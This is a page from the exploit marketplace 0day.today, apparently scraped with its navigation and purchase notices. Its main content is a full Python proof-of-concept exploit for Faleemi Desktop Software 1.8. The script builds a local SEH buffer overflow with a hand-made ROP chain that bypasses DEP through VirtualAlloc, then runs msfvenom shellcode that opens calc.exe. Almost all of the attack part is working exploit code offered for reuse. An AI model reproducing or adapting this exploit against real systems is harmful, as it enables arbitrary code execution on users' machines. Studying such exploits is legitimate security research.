0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH) (DEP Bypass) Exploit
#!/usr/bin/python # Exploit Author: bzyo # Twitter: @bzyo_ # Exploit Title: Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH)(DEP Bypass) # Date: 01-26-19 # Vulnerable Software: Faleemi Desktop Software 1.8 # Vendor Homepage: https://www.faleemi.com/ # Version: 1.8.0 # Software Link 1: http://support.faleemi.com/fsc776/Faleemi_v1.8.exe # Tested Windows 7 SP1 x86 # PoC # 1. run script # 2. open/copy contents of faleemidep.txt # 3. open app, click on System Setup # 4. paste contents of faleemidep.txt in "Save Path for Snapshot and Record file" field # 5. click on save # 6. pop calc # manually created ropchain based on mona.py 'rop.txt' and 'ropfunc.txt' finds # practicing dep bypass by not using auto generated mona.py ropchains # original seh poc from Gionathan "John" Reale, EDB: 45402 # badchars; \x00\x0a\x0d\x2f import struct filename = "faleemidep.txt" junk = "A" * 264 #0x6001ea7e # ADD ESP,0B34 # POP EBX # POP EBP # POP ESI # POP EDI # RETN seh = "\x7e\xea\x01\x60" fill = "C"*524 #VirtualAlloc() #EDI = ROP NOP (RETN) rop = struct.pack('<L',0x60018221) # POP EDI # RETN rop += struct.pack('<L',0x60018222) # ROP-NOP #ECX = flProtect (0x40) rop += struct.pack('<L',0x60047e71) # POP ECX # RETN rop += struct.pack('<L',0xffffffff) for i in range(0,65): rop += struct.pack('<L',0x6004bcc7) # INC ECX # RETN #ESI = ptr to VirtualAlloc() rop += struct.pack('<L',0x6004aaca) # POP EAX # RETN rop += struct.pack('<L',0x6004f0bc) # ptr to &VirtualAlloc() rop += struct.pack('<L',0x68b88b96) # MOV EAX,DWORD PTR DS:[EAX] # RETN rop += struct.pack('<L',0x73d63c82) # XCHG EAX,ESI # RETN #EDX = flAllocationType (0x1000) # Math 1)FFFFFFFF - 0cc48368 = 0F33B7C97 Math 2)0F33B7C97 + 1001 = F33B8C98) rop += struct.pack('<L',0x68b832d3) # MOV EDX,0CC48368 # RETN rop += struct.pack('<L',0x60036b1c) # POP EBX # RETN rop += struct.pack('<L',0xF33B8C98) rop += struct.pack('<L',0x6004e5ce) # ADD EDX,EBX # POP EBX # RETN 0x10 rop += struct.pack('<L',0x60018222) # ROP-NOP #compensate for POP and RETN 10 rop += struct.pack('<L',0x60018222) # ROP-NOP #compensate for POP and RETN 10 rop += struct.pack('<L',0x60018222) # ROP-NOP #compensate for POP and RETN 10 rop += struct.pack('<L',0x60018222) # ROP-NOP #compensate for POP and RETN 10 rop += struct.pack('<L',0x60018222) # ROP-NOP #compensate for POP and RETN 10 rop += struct.pack('<L',0x60018222) # ROP-NOP #compensate for POP and RETN 10 #EBP = ReturnTo (ptr to jmp esp) #!mona jmp -r esp -cpb '\x00\x0a\x0d\x2f' rop += struct.pack('<L',0x68b901e9) # POP EBP # RETN rop += struct.pack('<L',0x73dd4206) # jmp esp #EBX = dwSize (0x1) rop += struct.pack('<L',0x73dbfebc) # POP EBX # RETN rop += struct.pack('<L',0xffffffff) rop += struct.pack('<L',0x73dcbe1c) # INC EBX # XOR EAX,EAX # RETN rop += struct.pack('<L',0x73dcbe1c) # INC EBX # XOR EAX,EAX # RETN #EAX = NOP (0x90909090) rop += struct.pack('<L',0x6004aaca) # POP EAX # RETN rop += struct.pack('<L',0x90909090) # NOPs #PUSHAD rop += struct.pack('<L',0x6004bd85) # PUSHAD # RETN nops = "\x90"*10 #msfvenom -p windows/exec cmd=calc.exe -b "\x00\x0a\x0d\x2f" -f python calc = "" calc += "\xd9\xf7\xb8\x0c\xa1\xba\x34\xd9\x74\x24\xf4\x5b\x29" calc += "\xc9\xb1\x31\x31\x43\x18\x83\xc3\x04\x03\x43\x18\x43" calc += "\x4f\xc8\xc8\x01\xb0\x31\x08\x66\x38\xd4\x39\xa6\x5e" calc += "\x9c\x69\x16\x14\xf0\x85\xdd\x78\xe1\x1e\x93\x54\x06" calc += "\x97\x1e\x83\x29\x28\x32\xf7\x28\xaa\x49\x24\x8b\x93" calc += "\x81\x39\xca\xd4\xfc\xb0\x9e\x8d\x8b\x67\x0f\xba\xc6" calc += "\xbb\xa4\xf0\xc7\xbb\x59\x40\xe9\xea\xcf\xdb\xb0\x2c" calc += "\xf1\x08\xc9\x64\xe9\x4d\xf4\x3f\x82\xa5\x82\xc1\x42" calc += "\xf4\x6b\x6d\xab\x39\x9e\x6f\xeb\xfd\x41\x1a\x05\xfe" calc += "\xfc\x1d\xd2\x7d\xdb\xa8\xc1\x25\xa8\x0b\x2e\xd4\x7d" calc += "\xcd\xa5\xda\xca\x99\xe2\xfe\xcd\x4e\x99\xfa\x46\x71" calc += "\x4e\x8b\x1d\x56\x4a\xd0\xc6\xf7\xcb\xbc\xa9\x08\x0b" calc += "\x1f\x15\xad\x47\x8d\x42\xdc\x05\xdb\x95\x52\x30\xa9" calc += "\x96\x6c\x3b\x9d\xfe\x5d\xb0\x72\x78\x62\x13\x37\x76" calc += "\x28\x3e\x11\x1f\xf5\xaa\x20\x42\x06\x01\x66\x7b\x85" calc += "\xa0\x16\x78\x95\xc0\x13\xc4\x11\x38\x69\x55\xf4\x3e" calc += "\xde\x56\xdd\x5c\x81\xc4\xbd\x8c\x24\x6d\x27\xd1" pad = "D" * (7000-len(fill + rop + nops + calc)) buffer = junk + seh + fill + rop + nops + calc + pad textfile = open(filename , 'w') textfile.write(buffer) textfile.close() # 0day.today [2024-09-28] #